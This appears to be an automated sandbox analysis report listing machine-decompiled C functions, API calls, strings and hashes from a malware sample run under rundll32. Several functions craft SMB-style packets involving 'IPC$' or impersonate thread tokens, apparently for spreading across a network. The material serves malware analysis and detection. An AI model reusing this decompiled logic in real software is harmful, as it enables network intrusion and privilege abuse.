Uniqueness Score: -1.00%

Function 007B50A2 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E007B50A2(void* __ecx, intOrPtr _a4, void* _a8, short _a12, signed int _a16) {
				char _v5;
				signed int _v12;
				void* _t25;
				short _t27;
				short _t28;
				void* _t39;
				signed int _t44;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(0x34);
				_t47 = 8;
				_v5 = 0;
				_t25 = HeapAlloc(GetProcessHeap(), _t47, ??);
				_t39 = _t25;
				if(_t39 == 0) {
					L7:
					return _v5;
				}
				do {
					 *_t25 =  !( *(0x7c3730 + _t25));
					_t25 = _t25 + 1;
					_t47 = _t47 - 1;
				} while (_t47 != 0);
				_t27 = 0x34;
				 *((short*)(_t39 + 8)) = _t27;
				_t28 = 0x13;
				_t44 = 5;
				 *((intOrPtr*)(_t39 + 0xc)) = 3;
				 *((short*)(_t39 + 0x16)) = _t28;
				_t10 = _t39 + 0x18; // 0x18
				memcpy(_t10, _a16, _t44 << 2);
				if(E007B2F5A(_a4, _a8, _a12, 0, 0xff, 8, _t39, 0x34) != 0) {
					_v12 = _v12 & 0x00000000;
					_a16 = _a16 & 0x00000000;
					if(E007B3071(0, _a4, _a8, _a12,  &_a16,  &_v12) != 0) {
						HeapFree(GetProcessHeap(), 8, _a16);
						_v5 = 1;
					}
				}
				HeapFree(GetProcessHeap(), 8, _t39);
				goto L7;
			}

0x007b50a5
0x007b50a6
0x007b50a9
0x007b50ad
0x007b50af
0x007b50ba
0x007b50c0
0x007b50c4
0x007b5162
0x007b5168
0x007b5168
0x007b50d2
0x007b50d7
0x007b50d9
0x007b50da
0x007b50da
0x007b50df
0x007b50e5
0x007b50e9
0x007b50ec
0x007b50fc
0x007b5106
0x007b510d
0x007b5110
0x007b511f
0x007b5121
0x007b5125
0x007b5141
0x007b514f
0x007b5151
0x007b5151
0x007b5141
0x007b515f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000034,74654F20,00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000), ref: 007B50B3
HeapAlloc.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 007B50BA
GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0), ref: 007B5148
HeapFree.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000), ref: 007B514F
GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0,?,?,?,007B52FD,?), ref: 007B5158
HeapFree.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 007B515F

Strings

Oet Uet0Xet, xrefs: 007B50B3, 007B5148, 007B5158
07|, xrefs: 007B50CB

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$Alloc
String ID: Oet Uet0Xet$07|
API String ID: 3689955550-2676941948
Opcode ID: 7d4e213bce4ee5437a27a0adbdc30ba050315891a49b8401b828224760754d66
Instruction ID: f609876bafabcd8b218c9f4f6042b8cd61ffc5992014e8f958712cc06696f7b2
Opcode Fuzzy Hash: 7d4e213bce4ee5437a27a0adbdc30ba050315891a49b8401b828224760754d66
Instruction Fuzzy Hash: 2A21CF7254024DBBEF228F94DC49FEB3B6CEF44315F048055FE44AA191D6B99E19CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B4E60 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 91
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B4E60(intOrPtr _a4, void* _a8, short _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _t27;
				short _t29;
				signed char* _t31;
				void* _t38;
				signed char _t45;
				signed int* _t51;
				void* _t53;
				intOrPtr _t54;
				void* _t57;

				_v5 = 0;
				_t27 = HeapAlloc(GetProcessHeap(), 8, 0x48);
				_t57 = _t27;
				if(_t57 == 0) {
					L11:
					return _v5;
				}
				_t53 = 0x10;
				do {
					 *_t27 =  !( *(0x7c3730 + _t27));
					_t27 = _t27 + 1;
					_t53 = _t53 - 1;
				} while (_t53 != 0);
				_t29 = 0x48;
				 *((short*)(_t57 + 8)) = _t29;
				 *((short*)(_t57 + 0x10)) = 0x10b8;
				 *((short*)(_t57 + 0x12)) = 0x10b8;
				 *((char*)(_t57 + 2)) = 0xb;
				_t51 = 0x7c3700;
				_t7 = _t57 + 0x18; // 0x18
				_t31 = _t7;
				_t54 = 0x30;
				do {
					_t45 =  !( *_t51);
					_t51 =  &(_t51[0]);
					 *_t31 = _t45;
					_t31 =  &(_t31[1]);
					_t54 = _t54 - 1;
				} while (_t54 != 0);
				if(E007B2F5A(_a4, _a8, _a12, _t54, 0xff, 8, _t57, 0x48) != 0) {
					_v16 = _v16 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					if(E007B3071(_t51, _a4, _a8, _a12,  &_v12,  &_v16) != 0) {
						_t38 = _v12;
						if(0 ==  *((intOrPtr*)(_t38 + _v16 - 0x18))) {
							_v5 = 1;
						}
						HeapFree(GetProcessHeap(), 8, _t38);
					}
				}
				HeapFree(GetProcessHeap(), 8, _t57);
				goto L11;
			}

0x007b4e72
0x007b4e79
0x007b4e7f
0x007b4e83
0x007b4f38
0x007b4f3e
0x007b4f3e
0x007b4e90
0x007b4e94
0x007b4e99
0x007b4e9b
0x007b4e9c
0x007b4e9c
0x007b4ea1
0x007b4ea2
0x007b4eaf
0x007b4eb3
0x007b4eb7
0x007b4ebb
0x007b4ec0
0x007b4ec0
0x007b4ec3
0x007b4ec4
0x007b4ec6
0x007b4ec8
0x007b4ec9
0x007b4ecb
0x007b4ecc
0x007b4ecc
0x007b4ef0
0x007b4ef2
0x007b4ef6
0x007b4f12
0x007b4f14
0x007b4f21
0x007b4f23
0x007b4f23
0x007b4f2d
0x007b4f2d
0x007b4f12
0x007b4f35
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 007B4E76
HeapAlloc.KERNEL32(00000000), ref: 007B4E79
GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B4F2A
HeapFree.KERNEL32(00000000), ref: 007B4F2D
GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 007B4F32
HeapFree.KERNEL32(00000000), ref: 007B4F35

Strings

07|, xrefs: 007B4E8B

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$Alloc
String ID: 07|
API String ID: 3689955550-312385953
Opcode ID: 00c15ab0b8cab0af0dd630a4eb44e2e924f0a6dd641f02f79c96e19731c68a71
Instruction ID: 04799d0063f158a09ed4bd294640c43cf8377e12b660d7fa7de2dcfd3958d75f
Opcode Fuzzy Hash: 00c15ab0b8cab0af0dd630a4eb44e2e924f0a6dd641f02f79c96e19731c68a71
Instruction Fuzzy Hash: 6F210431684248BEEF219B648C05FEF7F78EF65715F048059F5899B292DA788909C760

Uniqueness

Uniqueness Score: -1.00%

Function 007B317C Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E007B317C(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short _a12) {
				char _v5;
				void* _v12;
				void* _t19;
				signed int _t22;
				int _t24;
				signed int _t33;
				void* _t38;

				_v5 = 0;
				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_v12 = _t19;
				if(_t19 != 0) {
					_t37 =  *_a8;
					_t22 = rand();
					asm("cdq");
					_t33 = 0x14;
					 *((intOrPtr*)(_t37 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t22 % _t33;
					_t38 = 0;
					do {
						_t24 = rand();
						_t34 = _v12;
						 *(_t38 + _v12) = _t24;
						_t38 = _t38 + 1;
					} while (_t38 < 0x200);
					if(E007B2F5A(_a4,  *_a8, _a12, 0, 0xff, 4, _t34, 0x200) != 0) {
						_v5 = 1;
					}
					HeapFree(GetProcessHeap(), 8, _v12);
				}
				return _v5;
			}

0x007b318a
0x007b3195
0x007b319b
0x007b31a0
0x007b31ad
0x007b31af
0x007b31b3
0x007b31b4
0x007b31b7
0x007b31bb
0x007b31bd
0x007b31bd
0x007b31bf
0x007b31c2
0x007b31c5
0x007b31c6
0x007b31e9
0x007b31eb
0x007b31eb
0x007b31fb
0x007b31fb
0x007b3206

APIs

GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?), ref: 007B318E
HeapAlloc.KERNEL32(00000000,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007B3195
rand.MSVCRT ref: 007B31AF
rand.MSVCRT ref: 007B31BD
GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,007B47E5,?,?,00000000,?), ref: 007B31F4
HeapFree.KERNEL32(00000000,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007B31FB

Strings

Oet Uet0Xet, xrefs: 007B318E, 007B31F4

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Processrand$AllocFree
String ID: Oet Uet0Xet
API String ID: 1335519115-3175316637
Opcode ID: d459bd295477d18865678aa0cae30cb41b1daf30b5c59e9a223aec5b9614f106
Instruction ID: 7b07e3f971efacbf248fd61f7b1a8e6e2cc72d5acbd7979fc76bd11fb9f2247a
Opcode Fuzzy Hash: d459bd295477d18865678aa0cae30cb41b1daf30b5c59e9a223aec5b9614f106
Instruction Fuzzy Hash: FE110832100309BBDB119B98CC49FDE7F79FF45310F004068F6049B191DBB99949C764

Uniqueness

Uniqueness Score: -1.00%

Function 007B6BD1 Relevance: 10.1, APIs: 8, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E007B6BD1(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t23;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t47;
				void* _t52;

				_t52 = __esi;
				if(__esi != 0) {
					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
						L11:
						return HeapFree(GetProcessHeap(), 0, _t52);
					}
					_v8 = _v8 & 0x00000000;
					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
						L10:
						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
						goto L11;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 =  *(_t52 + 0x18) + _v8 * 4;
						if( *_t30 != 0) {
							_t32 =  *_t30;
							if( *_t32 != 0) {
								_t47 =  *((intOrPtr*)(_t52 + 0x30));
								if(_t47 != 0) {
									 *_t47( *_t32);
								}
								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
							}
							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
					goto L10;
				}
				return _t23;
			}

0x007b6bd1
0x007b6bd7
0x007b6bef
0x007b6c53
0x00000000
0x007b6c5c
0x007b6bf4
0x007b6bfa
0x007b6c49
0x007b6c51
0x00000000
0x00000000
0x00000000
0x00000000
0x007b6bfc
0x007b6bfc
0x007b6c02
0x007b6c08
0x007b6c0a
0x007b6c0f
0x007b6c11
0x007b6c16
0x007b6c1a
0x007b6c1a
0x007b6c2c
0x007b6c2c
0x007b6c3c
0x007b6c3c
0x007b6c3e
0x007b6c44
0x00000000
0x007b6bfc
0x007b6c5e

APIs

GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C29
HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C2C
GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C39
HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C3C
GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C4E
HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C51
GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C56
HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C59

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: c80cedfc482428cad67062f01be2bfc69a307c3f429796ee257b703f888b4a65
Instruction ID: 1cf6c1492540186963c4fde8fde3afce73372d98db015b74127c7335325f2166
Opcode Fuzzy Hash: c80cedfc482428cad67062f01be2bfc69a307c3f429796ee257b703f888b4a65
Instruction Fuzzy Hash: CB114631600308EFDB24EF96CD81FAAB7B9EF85345F010458E645972A1CB78FD44CA60

Uniqueness

Uniqueness Score: -1.00%

Function 007B652F Relevance: 9.1, APIs: 6, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B652F(void* __ecx, signed int _a4) {
				int _v8;
				WCHAR** _v12;
				intOrPtr* _t20;
				int _t26;
				WCHAR** _t28;
				WCHAR* _t32;
				void* _t39;
				intOrPtr _t42;
				void* _t45;
				WCHAR* _t52;
				WCHAR* _t53;

				if(_a4 == 0) {
					L20:
					if( *0x7c7bc4 == 0) {
						 *0x7c7bc4 = 0x2d;
					}
					return 0;
				} else {
					_t20 = _a4;
					_t45 = _t20 + 2;
					do {
						_t42 =  *_t20;
						_t20 = _t20 + 2;
					} while (_t42 != 0);
					if(_t20 == _t45) {
						goto L20;
					}
					_v8 = 0;
					_t39 = CommandLineToArgvW(_a4,  &_v8);
					if(_t39 == 0) {
						L19:
						goto L20;
					}
					if(_v8 <= 0) {
						L18:
						LocalFree(_t39);
						goto L19;
					}
					_t26 = StrToIntW( *_t39);
					_t44 = 1;
					_a4 = 1;
					if(_t26 > 0) {
						 *0x7c7bc4 = _t26;
					}
					if(_v8 > _t44) {
						do {
							_t28 = _t39 + _a4 * 4;
							_t52 =  *_t28;
							_v12 = _t28;
							if(_t52 != StrStrW(_t52, L"-h")) {
								_t53 =  *_v12;
								if(_t53 != StrStrW(_t53, L"-f")) {
									_t32 = StrChrW(_t53, 0x3a);
									if(_t32 != 0) {
										_t44 = 0;
										 *_t32 = 0;
										E007B69AE(_t53,  &(_t32[1]), 1);
									}
								} else {
									 *0x7c7b7c =  *0x7c7b7c & 0xfffffffd;
								}
							} else {
								E007B64A6(_t52, _t44);
							}
							_a4 =  &(_a4[0]);
						} while (_a4 < _v8);
					}
					goto L18;
				}
			}

0x007b653a
0x007b660e
0x007b6616
0x007b6618
0x007b6618
0x007b6625
0x007b6540
0x007b6540
0x007b6543
0x007b6546
0x007b6546
0x007b6549
0x007b654c
0x007b6555
0x00000000
0x00000000
0x007b6563
0x007b656c
0x007b6570
0x007b660d
0x00000000
0x007b660d
0x007b6579
0x007b6606
0x007b6607
0x00000000
0x007b6607
0x007b6581
0x007b6589
0x007b658a
0x007b658f
0x007b6591
0x007b6591
0x007b6599
0x007b65a2
0x007b65a5
0x007b65a8
0x007b65b0
0x007b65b7
0x007b65c5
0x007b65d1
0x007b65df
0x007b65e7
0x007b65e9
0x007b65eb
0x007b65f5
0x007b65f5
0x007b65d3
0x007b65d3
0x007b65d3
0x007b65b9
0x007b65bb
0x007b65bb
0x007b65fa
0x007b6600
0x007b6605
0x00000000
0x007b6599

APIs

CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,007B7A8E,?), ref: 007B6566
StrToIntW.SHLWAPI(00000000,?,?,?,?,007B7A8E,?), ref: 007B6581
StrStrW.SHLWAPI(00000000,007C1580,?,?,?,?,?,007B7A8E,?), ref: 007B65B3
StrStrW.SHLWAPI(00000000,007C1588,?,?,?,?,?,007B7A8E,?), ref: 007B65CD
StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,007B7A8E,?), ref: 007B65DF
LocalFree.KERNEL32(00000000,?,?,?,?,007B7A8E,?), ref: 007B6607

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ArgvCommandFreeLineLocal
String ID:
API String ID: 1203019955-0
Opcode ID: 2f3d43a009bba879a224e5aa2cad289845dc2f2ea44c5339df235550766d4251
Instruction ID: 6d46d2125e5e2ba16d2ad17e12ab99788d1c84ef7ce9940829098c5f83d8e8d0
Opcode Fuzzy Hash: 2f3d43a009bba879a224e5aa2cad289845dc2f2ea44c5339df235550766d4251
Instruction Fuzzy Hash: 6931BD71500118EBCB21AF28D985FEEBBA8FF05755B008179E602DB250E77CEE60CB94

Uniqueness

Uniqueness Score: -1.00%

Function 007B98AB Relevance: 9.1, APIs: 6, Instructions: 76
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E007B98AB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void*** _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				void* __ebx;
				void* __esi;
				intOrPtr _t22;
				void* _t29;
				struct _SECURITY_ATTRIBUTES* _t39;
				void _t41;
				void* _t44;

				_t39 = 0;
				_t41 = 0;
				_v12 = 0;
				_t22 = E007B6CED(0,  &_v12);
				_v16 = _t22;
				if(_t22 == 0) {
					L12:
					return _t41;
				}
				while(1) {
					_t44 =  *( *_v12);
					_v32 = _t39;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v28 = _a4;
					_t29 = CreateThread(_t39, _t39, E007B988B,  &_v32, 4, _t39);
					_v8 = _t29;
					if(_t29 != _t39) {
						if(SetThreadToken( &_v8, _t44) != 0) {
							if(ResumeThread(_v8) == 0xffffffff) {
								GetLastError();
							} else {
								WaitForSingleObject(_v8, 0xffffffff);
							}
						}
						CloseHandle(_v8);
					}
					_t41 = _v32;
					if(_t41 != _t39 || E007B6D35(_v16, _a8,  &_v12) == 0) {
						break;
					}
					_t39 = 0;
				}
				E007B6B46(_v16);
				goto L12;
			}

0x007b98ba
0x007b98be
0x007b98c0
0x007b98c3
0x007b98c8
0x007b98cd
0x007b9969
0x007b996f
0x007b996f
0x007b98d7
0x007b98dc
0x007b98e0
0x007b98e6
0x007b98e7
0x007b98e8
0x007b98ef
0x007b98fd
0x007b9903
0x007b9908
0x007b9917
0x007b9925
0x007b9934
0x007b9927
0x007b992c
0x007b992c
0x007b9925
0x007b993d
0x007b993d
0x007b9943
0x007b9948
0x00000000
0x00000000
0x007b98d5
0x007b98d5
0x007b9964
0x00000000

APIs

Part of subcall function 007B6CED: GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFC
Part of subcall function 007B6CED: HeapAlloc.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFF
Part of subcall function 007B6CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D24
Part of subcall function 007B6CED: HeapFree.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D27

CreateThread.KERNEL32 ref: 007B98FD
SetThreadToken.ADVAPI32(?,?,?,007BA15C,?,?), ref: 007B990F
ResumeThread.KERNEL32(?,?,007BA15C,?,?), ref: 007B991C
WaitForSingleObject.KERNEL32(?,000000FF,?,007BA15C,?,?), ref: 007B992C
GetLastError.KERNEL32(?,007BA15C,?,?), ref: 007B9934
CloseHandle.KERNEL32(?,?,007BA15C,?,?), ref: 007B993D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
String ID:
API String ID: 298440786-0
Opcode ID: b12dc65210e3c2ee8524a018914336110ebef41863de4520270e9e604ca79c1f
Instruction ID: 96a0685c91d78d18482443cc2bb59ea0ddf742d43ac236095b966625e3a728df
Opcode Fuzzy Hash: b12dc65210e3c2ee8524a018914336110ebef41863de4520270e9e604ca79c1f
Instruction Fuzzy Hash: 8B211075A00109FFCF109FA8DC85ADEB779EF49314F114569E721E3160E738AE059B50

Uniqueness

Uniqueness Score: -1.00%

Function 007BA3B1 Relevance: 9.0, APIs: 6, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007BA3B1(void* __ecx, void* _a4) {
				void* _v8;
				void* _t9;
				long _t18;

				_v8 = 0;
				_t18 = 0;
				_t9 = CreateThread(0, 0, E007BA016, 0, 4, 0);
				_v8 = _t9;
				if(_t9 == 0) {
					_t18 = 0x57;
				} else {
					if(SetThreadToken( &_v8, _a4) == 0) {
						_t18 = GetLastError();
						goto L5;
					} else {
						if(ResumeThread(_v8) == 0xffffffff) {
							L5:
							CloseHandle(_v8);
							_v8 = 0;
						}
					}
				}
				SetLastError(_t18);
				return _v8;
			}

0x007ba3c4
0x007ba3c7
0x007ba3c9
0x007ba3cf
0x007ba3d4
0x007ba40f
0x007ba3d6
0x007ba3e5
0x007ba3fd
0x00000000
0x007ba3e7
0x007ba3f3
0x007ba3ff
0x007ba402
0x007ba408
0x007ba408
0x007ba3f3
0x007ba3e5
0x007ba411
0x007ba41d

APIs

CreateThread.KERNEL32 ref: 007BA3C9
SetThreadToken.ADVAPI32(?,?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3DD
ResumeThread.KERNEL32(?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3EA
GetLastError.KERNEL32(?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3F7
CloseHandle.KERNEL32(?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA402
SetLastError.KERNEL32(00000057,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA411

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
String ID:
API String ID: 2435877492-0
Opcode ID: bcde19e9d168ba2367e85a59897cdd36337a036ae109f26920e7f27865eac505
Instruction ID: 17979c6da990e10fbbd859f75b98aa3da342b2c8c1036559f9559b6217ded089
Opcode Fuzzy Hash: bcde19e9d168ba2367e85a59897cdd36337a036ae109f26920e7f27865eac505
Instruction Fuzzy Hash: 74018F30501119FBCB30AB65ED0DEDE7E78EB85774B204121F505D2150E7B88E41EAA5

Uniqueness

Uniqueness Score: -1.00%

Function 007B796E Relevance: 9.0, APIs: 6, Instructions: 36
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B796E(void* __ecx, void* _a4) {
				void* _v8;
				void _v12;
				void* _t12;

				_v12 = _v12 & 0x00000000;
				_t12 = CreateThread(0, 0, E007B7957,  &_v12, 4, 0);
				_v8 = _t12;
				if(_t12 != 0) {
					if(SetThreadToken( &_v8, _a4) != 0) {
						if(ResumeThread(_v8) == 0xffffffff) {
							GetLastError();
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
						}
					}
					CloseHandle(_v8);
				}
				return _v12;
			}

0x007b7973
0x007b7988
0x007b798e
0x007b7993
0x007b79a4
0x007b79b2
0x007b79c1
0x007b79b4
0x007b79b9
0x007b79b9
0x007b79b2
0x007b79ca
0x007b79ca
0x007b79d4

APIs

CreateThread.KERNEL32 ref: 007B7988
SetThreadToken.ADVAPI32(?,00000000,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B799C
ResumeThread.KERNEL32(?,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79A9
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79B9
GetLastError.KERNEL32(?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79C1
CloseHandle.KERNEL32(?,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79CA

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
String ID:
API String ID: 1168161173-0
